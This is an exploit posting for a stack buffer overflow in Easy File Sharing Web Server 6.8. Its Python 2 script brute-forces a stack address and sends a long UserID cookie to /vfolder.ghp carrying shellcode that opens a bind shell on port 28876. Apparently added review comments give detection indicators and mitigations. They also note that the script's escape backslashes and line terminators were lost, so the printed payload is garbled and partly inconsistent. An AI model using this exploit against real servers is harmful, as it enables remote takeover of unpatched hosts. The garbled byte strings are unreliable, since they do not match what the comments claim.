Easy File Sharing Web Server 6.8 Buffer Overflow
Posted on 15 May 2014
# Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow
# Date: 10 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 6.8
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when the following instruction is
# executed:
#
# 0x0045C8C2: CALL DWORD PTR DS:[EDX+28]
#
# We can point EDX+28 to a location in the stack containing a pointer to
# instructions we want to execute. This pointer can be placed at 0x01??6969.
# Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes
# in the address are always the same. The second byte is random so we need
# to bruteforce it. This takes at most 255 tries and the server doesn't crash
# so we can keep trying.
#
# The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to
# a small space in our payload. We fill this small space with instructions to
# jump further down the stack where our shellcode is stored.
#
# Tested with Easy File Sharing Webserver installed in the default location at
# C:EFS SoftwareEasy File Sharing Web Server
#
# --- Review notes (defender / reader orientation) ---
# Vulnerability class: a stack buffer overflow triggered by an over-long
# `UserID` cookie value on a GET to /vfolder.ghp (see the request built in the
# loop below). The description above explains that the overwritten value is
# used as a pointer by an indirect CALL; the technique depends on the stack
# address being predictable except for one byte, which the text attributes to
# Windows XP SP2/SP3 (no ASLR). Whether the technique applies to other hosts
# cannot be told from this file.
# What the script does, as visible below: it sends up to 254 HTTP requests
# (one per candidate address byte) to the target, each carrying a UserID
# cookie several hundred bytes long (runs of "A" and "C" padding plus binary
# data), and after each one tries to connect to TCP port 28876 on the target,
# which is where the shellcode comment says a bind shell would listen.
# Indicators that follow directly from this: repeated GET /vfolder.ghp
# requests with an abnormally long Cookie header in quick succession, and a
# new listener / inbound connection on port 28876 on the file-sharing host.
# Mitigation: do not expose this service to untrusted networks; run a vendor
# version that addresses the issue (a fixed version is not stated here);
# platform-level protections (DEP/ASLR) that the description says are absent
# on the tested XP hosts change the picture on newer systems.
# Transcription caveat: the backslashes of every "\x.." escape (and of the
# Windows path above) appear to have been lost when this page was extracted.
# As written, literals such as "x90" are plain ASCII letters, not the bytes the
# comments describe, so the script as printed does not send what the comments
# claim. The CRLF line terminators of the HTTP request appear to be missing
# for the same reason. They are deliberately left as-is here.
# This is Python 2 syntax (`print` statement, `xrange`, `except Exception,e`).

import socket
import struct
import time  # NOTE(review): imported but not used anywhere in this script
import sys

# The host and port the requests below are sent to; both are hard-coded.
target = "192.168.1.140"
port = 80

# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Binds a shell on port 28876
# msfencode -b 'x00x20' -i w32-bind-ngs-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
# NOTE(review): see the transcription caveat in the header -- the escape
# backslashes are missing, so this string is not the encoded payload the
# comment above describes.
shellcode = (
    "xbbxa1x68xdex7cxddxc0xd9x74x24xf4x58x33xc9" +
    "xb1x36x31x58x14x83xe8xfcx03x58x10x43x9dxef" +
    "xb5xe7xd5x61x76x6cx9fx8dxfdx04x7cx05x6fxe0" +
    "xf7x67x50x7bx31xa0xdfx63x4bx23x8exfbx81x9c" +
    "x02xc9x8dx44x33x5ax3dxe1x0cx2bxc8x69xfbxd5" +
    "x7ex8axd5xd5xa8x41xacx02x7cxaax05x8dxd0x0c" +
    "x0bx5ax82x0dx44x48x80x5dx10xcdxf4xeax7axf0" +
    "x7cxecx69x81x36xcex6cx7cx9ex3fxbdx3cx94x74" +
    "xd0xc1x44xc0xe4x6dxacx58x21xa9xf1xebx44xc6" +
    "x30x2bxd2xc3x1bxb8x57x37xa5x57x68x80xb1xf6" +
    "xfcxa5xa5xf9xebxb0x3exfaxefx53x15x7dxd1x5a" +
    "x1fx76xa3x02xdbxd5x44x6axb4x4cx3axb4x48x1a" +
    "x8ax96x03x1bx3cx8bxa3x34x28x52x74x4bxacxdb" +
    "xb8xd9x43xb4x13x48x9bxeaxe9xb3x17xf2xc3xe1" +
    "x8ax6ax47x6bx4fx4ax0ax0fxabxb2xbfx5bx18x04" +
    "xf8x72x5exdcx80xb9x45x8bxdcx93xd7xf5xa6xfc" +
    "xd0xaex7ax51xb6x02x84x03xdcx29x3cx50xf5xe7" +
    "x3ex57xf9"
)

print "[+] We're guessing an address on the stack. It will be a few minutes..."

# One iteration per candidate value of the unpredictable address byte.
# NOTE(review): xrange(1,255) yields 1..254, so the values 0x00 and 0xff are
# never tried, despite the header's "at most 255 tries".
for i in xrange(1,255):
    # Two-digit lowercase hex form of i, zero-padded for i < 16.
    n = ""
    if i < 16:
        n = "0" + hex(i)[-1]
    else:
        n = hex(i)[2:]

    # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
    # NOTE(review): the header text speaks of 0x01??6969 while the code builds
    # 0x01??6940; which one is intended cannot be determined from this file.
    guess = "0x01" + n + "6940"
    # Progress indicator: one "=" per attempt, no newline.
    sys.stdout.write("=");

    # Build the over-long cookie value. Layout as commented by the author:
    # padding, a short stub, padding, the guessed pointer, more padding, a
    # fixed pointer, a NOP sled, then the shellcode.
    payload = "A"*64  # padding
    payload += "x81xeex70xffxffxff"  # SUB ESI,-90
    payload += "xffxe6"  # JMP ESI
    payload += "A"*8  # padding
    payload += struct.pack("<I", int(guess, 16))  # overwrite EDX with
                                                   # pointer to CALL ESI
    payload += "C"*108  # padding
    payload += struct.pack("<I", 0x10023701)  # pointer to CALL ESI
    payload += "x90"*20  # NOP sled
    # NOTE(review): this trailing comment says calc.exe, but the shellcode
    # header above describes a bind shell on port 28876 and the success check
    # below connects to that port; the comment looks stale.
    payload += shellcode  # calc.exe

    # craft the request
    # Adjacent string literals are joined by the parser; the `+` parts splice
    # in target/port and the payload. Note the header name "Conection" is
    # misspelled in the original (left unchanged).
    buf = (
        "GET /vfolder.ghp HTTP/1.1 "
        "User-Agent: Mozilla/4.0 "
        "Host:" + target + ":" + str(port) + " "
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
        "Accept-Language: en-us "
        "Accept-Encoding: gzip, deflate "
        "Referer: http://" + target + "/ "
        "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=; "
        "Conection: Keep-Alive "
    )

    # send the request and payload to the server
    # The response is never read; the socket is closed right after send().
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s1.connect((target, port))
    s1.send(buf)
    s1.close()

    try:
        # check if we guessed the correct address by connecting to port 28876
        # A successful connect is taken as the success signal and ends the loop.
        s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s2.connect((target, 28876))
        s2.close()
        print " [+] Success! A shell is waiting on port 28876!"
        break
    except Exception,e:
        # Connection refused (or any other error) means this guess did not
        # work; the loop simply moves on to the next candidate byte.
        pass
